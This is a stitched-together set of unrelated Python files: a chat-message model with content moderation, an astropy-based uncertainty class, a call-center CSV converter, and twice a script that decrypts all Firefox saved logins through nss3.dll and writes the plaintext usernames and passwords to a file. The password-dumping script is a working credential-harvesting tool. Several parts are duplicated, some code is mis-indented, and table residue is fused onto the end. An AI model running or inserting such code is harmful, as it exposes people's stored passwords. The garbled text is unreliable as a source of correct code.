from mongoengine import *
from base.settings import CHATPAMONGO
from app.util.messageque.msgsender import MessageSender
from app.customer.models.user import User
from app.util.shumeitools.shumeitools import *

# Open the module-level MongoDB connection used by the documents below.
# The original line held a redaction placeholder (`<PASSWORD>`), which is not
# valid Python; read the credential from settings like the other connection
# fields. Assumes CHATPAMONGO exposes a `.password` attribute -- TODO confirm.
connect(CHATPAMONGO.db, host=CHATPAMONGO.host, port=CHATPAMONGO.port, username=CHATPAMONGO.username,
        password=CHATPAMONGO.password)
class ChatMessage(Document):
    """One chat message between two users.

    Text messages (type 1) go through the shumei anti-spam check before being
    persisted; image messages (type 2) are queued for asynchronous moderation.
    """
    from_user_id = IntField(verbose_name=u"用户id")
    to_user_id = IntField(verbose_name=u"接收用户id")
    # Pass the callable, not its result: `default=datetime.datetime.now()`
    # froze the module-import timestamp into every new document.
    create_time = DateTimeField(verbose_name=u"创建时间", default=datetime.datetime.now)
    type = IntField(verbose_name=u"消息类型")  # 1: text  2: image  3: audio
    content = StringField(max_length=1024, verbose_name=u"消息内容")
    conversation_id = StringField(verbose_name=u"会话id", max_length=64)
    resource_url = StringField(verbose_name=u"图片,音频 资源地址", max_length=512)
    show_status = IntField(verbose_name=u"图片,音频 鉴定状态")  # 1: visible  2: blocked  3: pending review

    @classmethod
    def create_chat_message(cls, from_user_id, to_user_id, type, content, conversation_id, resource_url, user_ip):
        """Persist a message and advance the conversation state machine.

        Returns ``(status, create_time, conversation_id, message)``; status 2
        means the text was rejected by moderation, status 1 means the
        conversation has just become established.
        """
        obj_ = cls()
        obj_.from_user_id = from_user_id
        obj_.to_user_id = to_user_id
        obj_.type = type
        obj_.content = content
        obj_.create_time = datetime.datetime.now()
        obj_.conversation_id = conversation_id
        obj_.resource_url = resource_url
        # Images start hidden (pending review); everything else shows at once.
        if int(type) == 2:
            obj_.show_status = 3
        else:
            obj_.show_status = 1
        if int(type) == 1:
            # Synchronous text-content moderation.
            user = User.objects.filter(id=from_user_id).first()
            ret, duration = shumei_text_spam(text=content, timeout=1, user_id=from_user_id, channel="MESSAGE", nickname=user.nickname,
                                             phone=user.phone, ip=user_ip)
            is_pass = 0
            if ret["code"] == 1100:
                if ret["riskLevel"] == "PASS":
                    is_pass = 1
                    obj_.show_status = 1
                if ret["riskLevel"] == "REJECT":
                    is_pass = 0
                    obj_.show_status = 2
                if ret["riskLevel"] == "REVIEW":
                    # TODO: route to a manual-review flow; treated as pass for now.
                    is_pass = 1
                    obj_.show_status = 1
            obj_.save()
            if not is_pass:
                message = u"经系统检测,您的内容涉及违规因素,请重新编辑"
                return 2, None, None, message
        else:
            # Bug fix: non-text messages were never saved here, so `obj_.id`
            # below was None when queued for image moderation. TODO confirm
            # there is no other save path for these documents.
            obj_.save()
        # Advance conversation state.
        status = 0
        create_time = None
        conversation = UserConversation.objects.filter(id=conversation_id).first()
        con_type = conversation.type
        now = datetime.datetime.now()
        if con_type == 3:
            # Prop stage -> waiting for a reply.
            conversation.update(set__type=2)
            conversation.update(set__wait_time=now)
        if con_type == 2:
            # If the peer has already replied in this conversation, mark it established.
            message = ChatMessage.objects.filter(conversation_id=conversation_id, from_user_id=to_user_id, to_user_id=from_user_id).first()
            if message:
                conversation.update(set__type=1)
                conversation.update(set__start_time=now)
                status = 1
                create_time = now
        if int(type) == 2:
            # Queue the image for asynchronous moderation.
            MessageSender.send_picture_detect(pic_url=resource_url, user_id=0, pic_channel=0, source=4, obj_id=str(obj_.id))
        return status, create_time, conversation_id, ""
class UserConversation(Document):
    """State of a conversation initiated by `from_user_id` toward `to_user_id`."""
    from_user_id = IntField(verbose_name=u"用户id")
    to_user_id = IntField(verbose_name=u"接收用户id")
    send_id = IntField(verbose_name=u"道具使用 用户id")
    # Callable default: evaluated per document instead of once at import time.
    create_time = DateTimeField(verbose_name=u"创建时间", default=datetime.datetime.now)
    type = IntField(verbose_name=u"会话状态")  # 1: established  2: not established  3: prop stage  4: closed
    start_time = DateTimeField(verbose_name=u"会话开始时间")
    stop_time = DateTimeField(verbose_name=u"会话关闭时间")
    wait_time = DateTimeField(verbose_name=u"等待开始时间")
    is_send_tool = IntField(verbose_name=u"是否使用道具")  # 1: used  2: not used
    tool_time_type = IntField(verbose_name=u"道具消耗的类型")  # 0: time-limited  1: permanent
    stop_type = IntField(verbose_name=u"是否使用道具")  # 1: closed on timeout  2: cancelled

    @classmethod
    def create_conversation_message(cls, from_user_id, to_user_id, type, is_send_tool):
        """Create, persist and return a new conversation document."""
        obj_ = cls()
        obj_.from_user_id = from_user_id
        obj_.to_user_id = to_user_id
        obj_.type = type
        obj_.is_send_tool = is_send_tool
        obj_.create_time = datetime.datetime.now()
        obj_.save()
        return obj_

    @classmethod
    def cancel(cls, conversation_id, from_user_id, to_user_id):
        """Close both directions of the conversation, marking them cancelled."""
        conversation = cls.objects.filter(id=conversation_id, from_user_id=from_user_id, to_user_id=to_user_id).first()
        rever_conversation = cls.objects.filter(id=conversation_id, from_user_id=to_user_id, to_user_id=from_user_id).first()
        # One timestamp for both directions keeps the pair consistent.
        now = datetime.datetime.now()
        for conv in (conversation, rever_conversation):
            if conv:
                conv.update(set__type=4)
                conv.update(set__stop_time=now)
                conv.update(set__stop_type=2)
import base64
import configparser
import ctypes
import json
import os
# NSS SECStatus return codes.
SEC_SUCCESS = 0
SEC_FAILURE = -1
# Handle to the loaded nss3.dll; set by InitNssDll().
NssDll = None
# Filled in by main(): Firefox profile dir, logins.json path, output file path.
ProfilePath = ''
JsonConfigPath = ''
OutputFilePath = ''
# Master password (original comment: 主密码); empty when the profile has none.
MasterPwd = ''
class SECItem(ctypes.Structure):
    """ctypes mirror of NSS's SECItem struct: (type, data pointer, length)."""
    _fields_ = [
        ('type', ctypes.c_int),
        ('data', ctypes.c_char_p),
        ('len', ctypes.c_uint),
    ]
def InitNssDll(masterPwd):
    """Load nss3.dll, initialize NSS against ProfilePath and authenticate.

    Returns True on success, False (after printing the failing step)
    otherwise. Expects the working directory to already be the Firefox
    install dir so nss3.dll's dependent DLLs resolve (see main()).
    """
    path = ctypes.c_char_p()
    path.value = ProfilePath.encode('utf-8')
    mpwd = ctypes.c_char_p()
    mpwd.value = masterPwd.encode('utf-8')
    global NssDll
    NssDll = ctypes.CDLL(r"nss3.dll")
    if NssDll.NSS_Init(path) != SEC_SUCCESS:
        print('NSS_Init failed')
        return False
    # NOTE(review): ctypes defaults every restype to c_int, but
    # PK11_GetInternalKeySlot returns a pointer -- on 64-bit builds the value
    # may be truncated here and again by the c_int() wrap below. Confirm
    # against the NSS headers before relying on this on Win64.
    keySlot = NssDll.PK11_GetInternalKeySlot()
    if keySlot == 0:
        print('PK11_GetInternalKeySlot failed')
        return False
    # Verify the (possibly empty) master password against the key slot.
    if NssDll.PK11_CheckUserPassword(ctypes.c_int(keySlot), mpwd) != SEC_SUCCESS:
        print('PK11_CheckUserPassword failed')
        return False
    if NssDll.PK11_Authenticate(keySlot, 1, 0) != SEC_SUCCESS:
        print('PK11_Authenticate failed')
        return False
    return True
def LoadJsonPwdData(path=None):
    """Read the encrypted login entries from Firefox's logins.json.

    Parameters
    ----------
    path : str, optional
        File to read; defaults to the module-level JsonConfigPath
        (backward-compatible generalization for testability).

    Returns
    -------
    list of dict
        One dict per login with keys 'username' and 'pwd' (both still
        encrypted/base64) and 'url' (the hostname).
    """
    if path is None:
        path = JsonConfigPath
    with open(path, "r") as o:
        js = json.load(o)
    # Iterate the entries directly instead of indexing via range(len(...)).
    return [{'username': login['encryptedUsername'],
             'pwd': login['encryptedPassword'],
             'url': login['hostname']}
            for login in js['logins']]
def Decode(cipher):
    """Decrypt a base64-encoded NSS SECItem; return the plaintext string.

    Raises RuntimeError when PK11SDR_Decrypt reports failure. (The original
    used a bare ``raise`` outside any except block, which itself raises
    ``RuntimeError('No active exception to re-raise')`` and hides the cause.)
    """
    data = base64.b64decode(cipher)
    secItem = SECItem()
    cipherItem = SECItem()
    cipherItem.type = 0
    cipherItem.data = data
    cipherItem.len = len(data)
    if NssDll.PK11SDR_Decrypt(ctypes.byref(cipherItem), ctypes.byref(secItem), 0) != SEC_SUCCESS:
        print('PK11SDR_Decrypt failed')
        raise RuntimeError('PK11SDR_Decrypt failed')
    result = ctypes.string_at(secItem.data, secItem.len).decode('utf8')
    return result
def DocodeEntry(entry):
    """Decrypt entry['username'] / entry['pwd'] in place.

    On any decryption failure both fields are replaced with '<Error>'.
    """
    try:
        entry['username'] = Decode(entry['username'])
        entry['pwd'] = Decode(entry['pwd'])
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate.
        print('Error when decode [ ' + entry['url'] + ' ]')
        entry['username'] = '<Error>'
        entry['pwd'] = '<Error>'
def DetermineProfileDirPath():
    """Return the first Firefox profile directory listed in profiles.ini."""
    appdata = os.environ['APPDATA']
    ini = configparser.ConfigParser()
    ini.read(os.path.join(appdata, r'Mozilla\Firefox\profiles.ini'))
    profile_name = ini['Profile0']['Path']
    return os.path.join(appdata, r'Mozilla\Firefox', profile_name)
def main():
    """Locate the Firefox profile, decrypt all saved logins, dump to a file."""
    global ProfilePath
    global JsonConfigPath
    global OutputFilePath
    ProfilePath = DetermineProfileDirPath()
    JsonConfigPath = os.path.join(ProfilePath, r'logins.json')
    OutputFilePath = os.path.join(os.environ['USERPROFILE'], r'output.txt')
    # nss3.dll must be loaded from the Firefox install dir so its dependent
    # DLLs resolve; switch the working directory before CDLL() runs.
    os.chdir(os.path.join(os.environ['PROGRAMFILES(X86)'], r'Mozilla Firefox'))
    if not InitNssDll(MasterPwd):
        return
    entries = LoadJsonPwdData()
    # Iterate entries directly; DocodeEntry mutates each dict in place.
    for entry in entries:
        DocodeEntry(entry)
    with open(OutputFilePath, 'w') as o:
        json.dump(entries, o, indent=1)


if __name__ == "__main__":
    # Dataset-table residue that was fused onto this line has been removed.
    main()
import base64
import configparser
import ctypes
import json
import os
# NSS SECStatus return codes.
SEC_SUCCESS = 0
SEC_FAILURE = -1
# Handle to the loaded nss3.dll; set by InitNssDll().
NssDll = None
# Filled in by main(): Firefox profile dir, logins.json path, output file path.
ProfilePath = ''
JsonConfigPath = ''
OutputFilePath = ''
# Master password (original comment: 主密码); empty when the profile has none.
MasterPwd = ''
class SECItem(ctypes.Structure):
    """ctypes mirror of NSS's SECItem struct: (type, data pointer, length)."""
    _fields_ = [
        ('type', ctypes.c_int),
        ('data', ctypes.c_char_p),
        ('len', ctypes.c_uint),
    ]
def InitNssDll(masterPwd):
    """Load nss3.dll, initialize NSS against ProfilePath and authenticate.

    Returns True on success, False (after printing the failing step)
    otherwise. Expects the working directory to already be the Firefox
    install dir so nss3.dll's dependent DLLs resolve (see main()).
    """
    path = ctypes.c_char_p()
    path.value = ProfilePath.encode('utf-8')
    mpwd = ctypes.c_char_p()
    mpwd.value = masterPwd.encode('utf-8')
    global NssDll
    NssDll = ctypes.CDLL(r"nss3.dll")
    if NssDll.NSS_Init(path) != SEC_SUCCESS:
        print('NSS_Init failed')
        return False
    # NOTE(review): ctypes defaults every restype to c_int, but
    # PK11_GetInternalKeySlot returns a pointer -- on 64-bit builds the value
    # may be truncated here and again by the c_int() wrap below. Confirm
    # against the NSS headers before relying on this on Win64.
    keySlot = NssDll.PK11_GetInternalKeySlot()
    if keySlot == 0:
        print('PK11_GetInternalKeySlot failed')
        return False
    # Verify the (possibly empty) master password against the key slot.
    if NssDll.PK11_CheckUserPassword(ctypes.c_int(keySlot), mpwd) != SEC_SUCCESS:
        print('PK11_CheckUserPassword failed')
        return False
    if NssDll.PK11_Authenticate(keySlot, 1, 0) != SEC_SUCCESS:
        print('PK11_Authenticate failed')
        return False
    return True
def LoadJsonPwdData(path=None):
    """Read the encrypted login entries from Firefox's logins.json.

    Parameters
    ----------
    path : str, optional
        File to read; defaults to the module-level JsonConfigPath
        (backward-compatible generalization for testability).

    Returns
    -------
    list of dict
        One dict per login with keys 'username' and 'pwd' (both still
        encrypted/base64) and 'url' (the hostname).
    """
    if path is None:
        path = JsonConfigPath
    with open(path, "r") as o:
        js = json.load(o)
    # Iterate the entries directly instead of indexing via range(len(...)).
    return [{'username': login['encryptedUsername'],
             'pwd': login['encryptedPassword'],
             'url': login['hostname']}
            for login in js['logins']]
def Decode(cipher):
    """Decrypt a base64-encoded NSS SECItem; return the plaintext string.

    Raises RuntimeError when PK11SDR_Decrypt reports failure. (The original
    used a bare ``raise`` outside any except block, which itself raises
    ``RuntimeError('No active exception to re-raise')`` and hides the cause.)
    """
    data = base64.b64decode(cipher)
    secItem = SECItem()
    cipherItem = SECItem()
    cipherItem.type = 0
    cipherItem.data = data
    cipherItem.len = len(data)
    if NssDll.PK11SDR_Decrypt(ctypes.byref(cipherItem), ctypes.byref(secItem), 0) != SEC_SUCCESS:
        print('PK11SDR_Decrypt failed')
        raise RuntimeError('PK11SDR_Decrypt failed')
    result = ctypes.string_at(secItem.data, secItem.len).decode('utf8')
    return result
def DocodeEntry(entry):
    """Decrypt entry['username'] / entry['pwd'] in place.

    On any decryption failure both fields are replaced with '<Error>'.
    """
    try:
        entry['username'] = Decode(entry['username'])
        entry['pwd'] = Decode(entry['pwd'])
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate.
        print('Error when decode [ ' + entry['url'] + ' ]')
        entry['username'] = '<Error>'
        entry['pwd'] = '<Error>'
def DetermineProfileDirPath():
    """Return the first Firefox profile directory listed in profiles.ini."""
    appdata = os.environ['APPDATA']
    ini = configparser.ConfigParser()
    ini.read(os.path.join(appdata, r'Mozilla\Firefox\profiles.ini'))
    profile_name = ini['Profile0']['Path']
    return os.path.join(appdata, r'Mozilla\Firefox', profile_name)
def main():
    """Locate the Firefox profile, decrypt all saved logins, dump to a file."""
    global ProfilePath
    global JsonConfigPath
    global OutputFilePath
    ProfilePath = DetermineProfileDirPath()
    JsonConfigPath = os.path.join(ProfilePath, r'logins.json')
    OutputFilePath = os.path.join(os.environ['USERPROFILE'], r'output.txt')
    # nss3.dll must be loaded from the Firefox install dir so its dependent
    # DLLs resolve; switch the working directory before CDLL() runs.
    os.chdir(os.path.join(os.environ['PROGRAMFILES(X86)'], r'Mozilla Firefox'))
    if not InitNssDll(MasterPwd):
        return
    entries = LoadJsonPwdData()
    # Iterate entries directly; DocodeEntry mutates each dict in place.
    for entry in entries:
        DocodeEntry(entry)
    with open(OutputFilePath, 'w') as o:
        json.dump(entries, o, indent=1)


if __name__ == "__main__":
    # Dataset-table residue that was fused onto this line has been removed.
    main()
import copy
from astropy import units
import numpy as np
from ._deriv import numpy_ufunc_derivatives, math_derivatives
from ..py_utils import check_iterable
from ..logger import logger
__all__ = ['unit_property', 'UFloat', 'ufloat', 'units']
# pylint:disable=no-else-return,no-else-raise
def _filter_compatible(inp, cls, attr, else_None=False):
"""Filter common data structures compatible with UFloat."""
if else_None:
inp = tuple(getattr(x, attr) if isinstance(x, cls) else None
for x in inp)
else:
inp = tuple(getattr(x, attr) if isinstance(x, cls) else x
for x in inp)
return inp
def unit_property(cls):
    """Class decorator adding a `unit` property backed by ``_unit``.

    Reading an unset unit yields ``units.dimensionless_unscaled``; setting a
    dimensionless (or ``None``) unit stores ``None``.
    """
    def _get(self):
        stored = self._unit  # noqa:W0212
        return units.dimensionless_unscaled if stored is None else stored

    def _set(self, value):
        if value is None or units.Unit(value) == units.dimensionless_unscaled:
            self._unit = None  # noqa:W0212
        else:
            self._unit = units.Unit(value)  # noqa:W0212

    cls._unit = None  # noqa:W0212
    cls.unit = property(_get, _set, doc="Physical unit of the data.")
    return cls
@unit_property
class UFloat():
    """Storing float values with stddev uncertainties and units.

    Parameters
    ----------
    value : number or array_like
        Nominal value(s) of the quantity.
    uncertainty : number, array_like or `None` (optional)
        Uncertainty value of the quantity. If `None`, the quantity will be
        considered with no errors. Must match `value` shape.
    unit : `~astropy.units.Unit` or string (optional)
        The data unit. Must be `~astropy.units.Unit` compliant.

    Notes
    -----
    - This class don't support memmapping. Is intended to be in memory ops.
    - Units are handled by `~astropy.units`.
    - Math operations cares about units and uncertainties.
    """

    _nominal = None
    _uncert = None
    _unit = None

    def __init__(self, value, uncertainty=None, unit=None):
        self.nominal = value
        self.uncertainty = uncertainty
        self.unit = unit

    def _set_uncert(self, value):
        """Validate and store the uncertainty; shape must match nominal."""
        if value is None:
            self._uncert = None
        else:
            if np.shape(value) != np.shape(self._nominal):
                raise ValueError('Uncertainty with shape different from '
                                 'nominal value: '
                                 f'{np.shape(value)} '
                                 f'{np.shape(self._nominal)}')
            if check_iterable(self._nominal):
                self._uncert = np.array(value)
            else:
                self._uncert = float(value)

    def _set_nominal(self, value):
        """Store the nominal value; a new value invalidates the uncertainty."""
        if value is None:
            raise ValueError('Nominal value cannot be None')
        self._nominal = value
        self._uncert = None  # always value is reset, uncertainty resets
        # No unit changes

    @property
    def uncertainty(self):
        """Uncertainty of the quantity (zeros when none was set)."""
        if self._uncert is None:
            if check_iterable(self._nominal):
                return np.zeros_like(self._nominal)
            return 0.0
        return self._uncert

    @uncertainty.setter
    def uncertainty(self, value):
        self._set_uncert(value)

    @property
    def nominal(self):
        """Nominal value of the quantity."""
        return self._nominal

    @nominal.setter
    def nominal(self, value):
        self._set_nominal(value)

    def reset(self, value, uncertainty=None, unit=None):
        """Reset all the data.

        Parameters
        ----------
        value : number or array_like
            Nominal value(s) of the quantity.
        uncertainty : number, array_like or `None` (optional)
            Uncertainty value of the quantity. Must match `value` shape.
        unit : `~astropy.units.Unit` or string (optional)
            The data unit. Must be `~astropy.units.Unit` compliant.
        """
        self.nominal = value
        self.uncertainty = uncertainty
        self.unit = unit

    def __repr__(self):
        ret = "< UFloat "
        # Arrays print their shape, scalars their value.
        if check_iterable(self._nominal):
            ret += str(np.shape(self._nominal))
        else:
            ret += str(self._nominal)
        if self._uncert is not None:
            ret += f"+-{self._uncert}"
        ret += f" {self.unit} "
        ret += " >"
        return ret

    def _compute_errors(self, derivs, inpnom, inpstd, **kwargs):
        """Propagate errors as sqrt(sum((df/dx_i * std_i)**2))."""
        n_derivs = len(derivs)
        if len(inpnom) != n_derivs or len(inpstd) != n_derivs:
            raise ValueError('Inputs and derivatives have different number '
                             'of components')
        # Bug fix: compare against None, not truthiness -- the original
        # `if axis:` silently mishandled the valid value axis=0. Also removed
        # the unreachable `return None` after the if/else.
        if kwargs.get('axis') is not None:
            raise NotImplementedError('Not implemented for apply in axis.')
        components = [derivs[i](*inpnom)*inpstd[i] for i in range(n_derivs)]
        return np.sqrt(np.sum(np.square(components)))

    def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
        """Intercept numpy ufuncs, propagating units and uncertainties."""
        # TODO: check units across the inputs (including inside lists)
        # Extract nominal values / uncertainties from any UFloat inputs.
        # (The original's copy.copy + single-element zip loops were dead code.)
        inpnom = _filter_compatible(inputs, UFloat, 'nominal')
        inpstd = _filter_compatible(inputs, UFloat, 'uncertainty',
                                    else_None=True)
        nkwargs = copy.copy(kwargs)
        skwargs = copy.copy(kwargs)
        if kwargs.get('out', ()):
            nkwargs['out'] = _filter_compatible(nkwargs['out'],
                                                UFloat, 'nominal')
            skwargs['out'] = _filter_compatible(skwargs['out'],
                                                UFloat, 'uncertainty',
                                                else_None=True)
        ufn = ufunc.__name__
        nominal = getattr(ufunc, method)(*inpnom, **nkwargs)
        if ufn in numpy_ufunc_derivatives:
            std_func = numpy_ufunc_derivatives[ufn]
            std = self._compute_errors(std_func, inpnom, inpstd, **skwargs)
        else:
            logger.warning("Function %s errors is not implemented.", ufn)
            std = None
        if isinstance(nominal, tuple):
            # ufuncs with multiple outputs (e.g. divmod)
            if std is None:
                std = [None]*len(nominal)
            return tuple(UFloat(n, s, self.unit)
                         for n, s in zip(nominal, std))
        if method == 'at':
            # in-place indexed operation: no return value
            return None
        # one return value
        return UFloat(nominal, std, self.unit)
def ufloat(value, uncertainty=None, unit=None):
    """Create a UFloat quantity to handle operations. Just wrap UFloat

    Parameters
    ----------
    value : number or array_like
        Nominal value(s) of the quantity.
    uncertainty : number, array_like or `None` (optional)
        Uncertainty value of the quantity. If `None`, the quantity will be
        considered with no errors. Must match `value` shape.
    unit : `~astropy.units.Unit` or string (optional)
        The data unit. Must be `~astropy.units.Unit` compliant.

    Returns
    -------
    q : `UFloat`
        Quantity generated value, with uncertainty and unit.
    """
    # Dataset-table residue fused into the original `return q` line removed.
    return UFloat(value, uncertainty, unit)
# --- a second concatenated copy of astropop/math/physical.py begins here ---
import copy
from astropy import units
import numpy as np
from ._deriv import numpy_ufunc_derivatives, math_derivatives
from ..py_utils import check_iterable
from ..logger import logger
__all__ = ['unit_property', 'UFloat', 'ufloat', 'units']
# pylint:disable=no-else-return,no-else-raise
def _filter_compatible(inp, cls, attr, else_None=False):
"""Filter common data structures compatible with UFloat."""
if else_None:
inp = tuple(getattr(x, attr) if isinstance(x, cls) else None
for x in inp)
else:
inp = tuple(getattr(x, attr) if isinstance(x, cls) else x
for x in inp)
return inp
def unit_property(cls):
    """Class decorator adding a `unit` property backed by ``_unit``.

    Reading an unset unit yields ``units.dimensionless_unscaled``; setting a
    dimensionless (or ``None``) unit stores ``None``.
    """
    def _get(self):
        stored = self._unit  # noqa:W0212
        return units.dimensionless_unscaled if stored is None else stored

    def _set(self, value):
        if value is None or units.Unit(value) == units.dimensionless_unscaled:
            self._unit = None  # noqa:W0212
        else:
            self._unit = units.Unit(value)  # noqa:W0212

    cls._unit = None  # noqa:W0212
    cls.unit = property(_get, _set, doc="Physical unit of the data.")
    return cls
@unit_property
class UFloat():
    """Storing float values with stddev uncertainties and units.

    Parameters
    ----------
    value : number or array_like
        Nominal value(s) of the quantity.
    uncertainty : number, array_like or `None` (optional)
        Uncertainty value of the quantity. If `None`, the quantity will be
        considered with no errors. Must match `value` shape.
    unit : `~astropy.units.Unit` or string (optional)
        The data unit. Must be `~astropy.units.Unit` compliant.

    Notes
    -----
    - This class don't support memmapping. Is intended to be in memory ops.
    - Units are handled by `~astropy.units`.
    - Math operations cares about units and uncertainties.
    """

    _nominal = None
    _uncert = None
    _unit = None

    def __init__(self, value, uncertainty=None, unit=None):
        self.nominal = value
        self.uncertainty = uncertainty
        self.unit = unit

    def _set_uncert(self, value):
        """Validate and store the uncertainty; shape must match nominal."""
        if value is None:
            self._uncert = None
        else:
            if np.shape(value) != np.shape(self._nominal):
                raise ValueError('Uncertainty with shape different from '
                                 'nominal value: '
                                 f'{np.shape(value)} '
                                 f'{np.shape(self._nominal)}')
            if check_iterable(self._nominal):
                self._uncert = np.array(value)
            else:
                self._uncert = float(value)

    def _set_nominal(self, value):
        """Store the nominal value; a new value invalidates the uncertainty."""
        if value is None:
            raise ValueError('Nominal value cannot be None')
        self._nominal = value
        self._uncert = None  # always value is reset, uncertainty resets
        # No unit changes

    @property
    def uncertainty(self):
        """Uncertainty of the quantity (zeros when none was set)."""
        if self._uncert is None:
            if check_iterable(self._nominal):
                return np.zeros_like(self._nominal)
            return 0.0
        return self._uncert

    @uncertainty.setter
    def uncertainty(self, value):
        self._set_uncert(value)

    @property
    def nominal(self):
        """Nominal value of the quantity."""
        return self._nominal

    @nominal.setter
    def nominal(self, value):
        self._set_nominal(value)

    def reset(self, value, uncertainty=None, unit=None):
        """Reset all the data.

        Parameters
        ----------
        value : number or array_like
            Nominal value(s) of the quantity.
        uncertainty : number, array_like or `None` (optional)
            Uncertainty value of the quantity. Must match `value` shape.
        unit : `~astropy.units.Unit` or string (optional)
            The data unit. Must be `~astropy.units.Unit` compliant.
        """
        self.nominal = value
        self.uncertainty = uncertainty
        self.unit = unit

    def __repr__(self):
        ret = "< UFloat "
        # Arrays print their shape, scalars their value.
        if check_iterable(self._nominal):
            ret += str(np.shape(self._nominal))
        else:
            ret += str(self._nominal)
        if self._uncert is not None:
            ret += f"+-{self._uncert}"
        ret += f" {self.unit} "
        ret += " >"
        return ret

    def _compute_errors(self, derivs, inpnom, inpstd, **kwargs):
        """Propagate errors as sqrt(sum((df/dx_i * std_i)**2))."""
        n_derivs = len(derivs)
        if len(inpnom) != n_derivs or len(inpstd) != n_derivs:
            raise ValueError('Inputs and derivatives have different number '
                             'of components')
        # Bug fix: compare against None, not truthiness -- the original
        # `if axis:` silently mishandled the valid value axis=0. Also removed
        # the unreachable `return None` after the if/else.
        if kwargs.get('axis') is not None:
            raise NotImplementedError('Not implemented for apply in axis.')
        components = [derivs[i](*inpnom)*inpstd[i] for i in range(n_derivs)]
        return np.sqrt(np.sum(np.square(components)))

    def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
        """Intercept numpy ufuncs, propagating units and uncertainties."""
        # TODO: check units across the inputs (including inside lists)
        # Extract nominal values / uncertainties from any UFloat inputs.
        # (The original's copy.copy + single-element zip loops were dead code.)
        inpnom = _filter_compatible(inputs, UFloat, 'nominal')
        inpstd = _filter_compatible(inputs, UFloat, 'uncertainty',
                                    else_None=True)
        nkwargs = copy.copy(kwargs)
        skwargs = copy.copy(kwargs)
        if kwargs.get('out', ()):
            nkwargs['out'] = _filter_compatible(nkwargs['out'],
                                                UFloat, 'nominal')
            skwargs['out'] = _filter_compatible(skwargs['out'],
                                                UFloat, 'uncertainty',
                                                else_None=True)
        ufn = ufunc.__name__
        nominal = getattr(ufunc, method)(*inpnom, **nkwargs)
        if ufn in numpy_ufunc_derivatives:
            std_func = numpy_ufunc_derivatives[ufn]
            std = self._compute_errors(std_func, inpnom, inpstd, **skwargs)
        else:
            logger.warning("Function %s errors is not implemented.", ufn)
            std = None
        if isinstance(nominal, tuple):
            # ufuncs with multiple outputs (e.g. divmod)
            if std is None:
                std = [None]*len(nominal)
            return tuple(UFloat(n, s, self.unit)
                         for n, s in zip(nominal, std))
        if method == 'at':
            # in-place indexed operation: no return value
            return None
        # one return value
        return UFloat(nominal, std, self.unit)
def ufloat(value, uncertainty=None, unit=None):
    """Create a UFloat quantity to handle operations. Just wrap UFloat

    Parameters
    ----------
    value : number or array_like
        Nominal value(s) of the quantity.
    uncertainty : number, array_like or `None` (optional)
        Uncertainty value of the quantity. If `None`, the quantity will be
        considered with no errors. Must match `value` shape.
    unit : `~astropy.units.Unit` or string (optional)
        The data unit. Must be `~astropy.units.Unit` compliant.

    Returns
    -------
    q : `UFloat`
        Quantity generated value, with uncertainty and unit.
    """
    # Dataset-table residue fused into the original `return q` line removed.
    return UFloat(value, uncertainty, unit)
import os
import codecs
import date as dg
import pandas as pd
import datetime
def generate_line(timestamp, ass_assignment, calls: int = 0):
    """Build one semicolon-separated CSV line with one-hot encoded
    day-of-week and month features.

    Replaces the previous 84-branch (7 weekdays x 12 months) if-chain,
    which also left ``out_line`` unbound (NameError) if no branch
    matched a malformed date.

    Parameters
    ----------
    timestamp : int
        Unix timestamp of the observation.
    ass_assignment : str
        Call-center name, written as the last field.
    calls : int, optional
        Number of received calls for the slot (default 0).

    Returns
    -------
    str
        ``"timestamp;calls;hour;<7 day flags>;<12 month flags>;assignment\\n"``
    """
    # Hour and month are parsed from the project date helper's string,
    # the weekday from datetime.fromtimestamp -- exactly as the original
    # did (both presumably local time; TODO confirm dg uses local time).
    date_str = dg.timestamp_to_date(timestamp)
    day_part, time_part = date_str.split(" ")
    hour = int(time_part.split(":")[0])
    month = int(day_part.split("-")[1])
    weekday = datetime.datetime.fromtimestamp(timestamp).weekday()  # 0 = Monday
    # One-hot encodings: Monday..Sunday, then January..December.
    day_flags = ["0"] * 7
    day_flags[weekday] = "1"
    month_flags = ["0"] * 12
    month_flags[month - 1] = "1"
    fields = ([str(timestamp), str(calls), str(hour)]
              + day_flags + month_flags + [ass_assignment])
    return ";".join(fields) + "\n"
def run():
    """Convert the raw call-center export into ``data/train.csv``.

    Keeps only rows whose assignment field (column 12) belongs to
    ``relevant_centers`` and rewrites them through :func:`generate_line`
    with one-hot day-of-week and month columns.
    """
    # Set literal instead of a list: membership is tested once per input
    # line, and a list scan per line is O(n) in the number of centers.
    relevant_centers = {
        "CAT", "CMS", "Crises", "Domicile", "Gestion",
        "Gestion - Accueil Telephonique", "Gestion Assurances",
        "Gestion Clients", "Gestion_DZ", "Gestion Relation Clienteles",
        "Gestion Renault", "Japon", "Manager", "Médical", "Mécanicien",
        "Nuit", "Prestataires", "RENAULT", "Regulation Medicale", "RTC",
        "SAP", "Services", "Tech. Axa", "Tech. Inter", "Tech. Total",
        "Téléphonie",
    }
    total_lines = 10878471  # known line count of the input, progress display only
    # Both handles are managed by ``with``: the output file was
    # previously opened outside any context manager and leaked if an
    # exception occurred mid-run.
    with codecs.open("data/train_2011_2012_2013.csv", "r",
                     encoding='utf-8') as in_file, \
         codecs.open("data/train.csv", "w", encoding='utf-8') as out:
        first_line = True
        line_counter = 0
        print("Done: 0 lines", end="")
        for raw in in_file:
            if line_counter % 1000 == 0:
                print("\rDone: {}/{} ({}%) lines".format(
                    line_counter, total_lines,
                    int(line_counter / total_lines * 100)), end="")
            parts = raw.split('\n')[0].split(";")
            if first_line:
                # Header row: keep column 0 (date), column 81 (calls) and
                # column 12 (assignment), inserting the engineered columns.
                out.write(parts[0] + ";" + parts[81] +
                          ";Hour;Monday;Tuesday;Wednesday;Thursday;Friday;"
                          "Saturday;Sunday;January;February;March;April;May;"
                          "June;July;August;September;October;November;"
                          "December;" + parts[12] + "\n")
                first_line = False
                line_counter += 1
                continue
            if parts[12] in relevant_centers:
                timestamp = int(dg.date_to_timestamp(parts[0]))
                out.write(generate_line(timestamp, parts[12], int(parts[81])))
            line_counter += 1
        print("\rDone: {}/{} ({}%) lines".format(
            line_counter, total_lines,
            int(line_counter / total_lines * 100)))
if __name__ == "__main__":
run() | src/build_train_csv.py | import os
import codecs
import date as dg
import pandas as pd
import datetime
def generate_line(timestamp, ass_assignment, calls: int = 0):
